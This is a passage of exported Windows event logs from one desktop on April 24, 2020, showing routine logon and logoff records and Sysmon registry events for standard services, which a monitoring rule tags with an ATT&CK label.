(Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0067:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000010 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.035706 -0.035438 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.081260 -0.072404 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:124K # 0K, PF:144K # 0K, P:144K) +[4] 0.000147 +J(0) +[5] - +[6] - +[7] - +[8] 0.002874 -0.000787 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.194263 -0.000185 (5) CM -0.193760 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 128K, P:256K) +[10] 0.000223 -0.000101 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 4K, PF:96K # 96K, P:96K) +[11] 0.000013 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000034 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:11:06.322",3,"The database engine is starting a new instance",,"""SearchIndexer (4700,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:11:06.281",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:01.845",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x89940 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:11:01.789",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x899DF + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:11:01.580",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x899DF + Linked Logon ID: 0x89940 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:01.503",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x89940 + Linked Logon ID: 0x899DF + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:57.259",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:51.143284900Z"",""eventRecordID"":""3372"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:51.027\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:51.027"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD 
(0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:51.027 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.963",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.728061800Z"",""eventRecordID"":""3366"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: 
HKLM\System\CurrentControlSet\Services\WpnUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.910",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.727654900Z"",""eventRecordID"":""3365"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:56.877",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.725899200Z"",""eventRecordID"":""3364"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.804",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.725538600Z"",""eventRecordID"":""3363"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.702",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.724188600Z"",""eventRecordID"":""3362"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_69cbe\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.608",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.723872200Z"",""eventRecordID"":""3361"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.502",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.722835500Z"",""eventRecordID"":""3360"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 13:10:56.431",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.722604400Z"",""eventRecordID"":""3359"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.369",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.721433300Z"",""eventRecordID"":""3358"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.280",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.721205600Z"",""eventRecordID"":""3357"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.245",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.720138200Z"",""eventRecordID"":""3356"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 